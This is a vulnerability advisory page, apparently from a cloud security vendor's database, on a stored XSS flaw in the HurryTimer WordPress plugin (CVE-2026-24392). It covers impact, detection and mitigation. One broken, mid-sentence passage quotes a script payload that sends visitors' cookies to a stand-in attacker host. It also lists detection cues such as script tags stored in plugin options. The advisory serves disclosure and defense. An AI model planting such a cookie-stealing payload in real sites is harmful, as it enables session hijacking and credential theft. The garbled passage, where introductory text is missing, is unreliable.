
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24392 is a Stored Cross-Site Scripting (XSS) vulnerability in the HurryTimer WordPress plugin developed by Nabil Lemsieh. The flaw allows authenticated attackers with high privileges to inject and store malicious scripts that execute in victims' browsers when they view affected pages. All versions of HurryTimer up to and including 2.14.2 are affected. It was published on February 19, 2026, with a CVSS v3.1 base score of 5.9 (Medium) (Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically the stored variant. An attacker with high-privilege access (e.g., administrator) can inject malicious JavaScript into plugin settings or content fields that are not properly sanitized or escaped before being rendered in the browser. Because the scope is changed (S:C in the CVSS vector), the injected script can affect users in a different security context than the attacker's session, such as site visitors or lower-privileged users (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit pages where the malicious payload is stored. This can result in session hijacking, credential theft, defacement of web content, or redirection of users to malicious sites. The confidentiality, integrity, and availability impacts are each rated Low, reflecting limited but real risk to affected users (Feedly).
Exploitation requires the attacker to be authenticated with high privileges (e.g., administrator-level access) on the WordPress site, and user interaction is required for the payload to trigger in a victim's browser. No public proof-of-concept exploit code or in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.029%, indicating a low probability of exploitation in the near term. This CVE does not appear in the CISA Known Exploited Vulnerabilities catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a plugin field that is rendered without proper output escaping.<script> tags or encoded JavaScript in plugin option fields.wp_options or related tables containing HurryTimer settings with embedded JavaScript or HTML event handlers (e.g., onerror, onload, <script>).Users should update the HurryTimer plugin to a version beyond 2.14.2 that includes a fix for this vulnerability. Until a patched version is available or applied, administrators should restrict plugin settings access to trusted users only and consider temporarily deactivating the plugin. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense (Feedly, Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."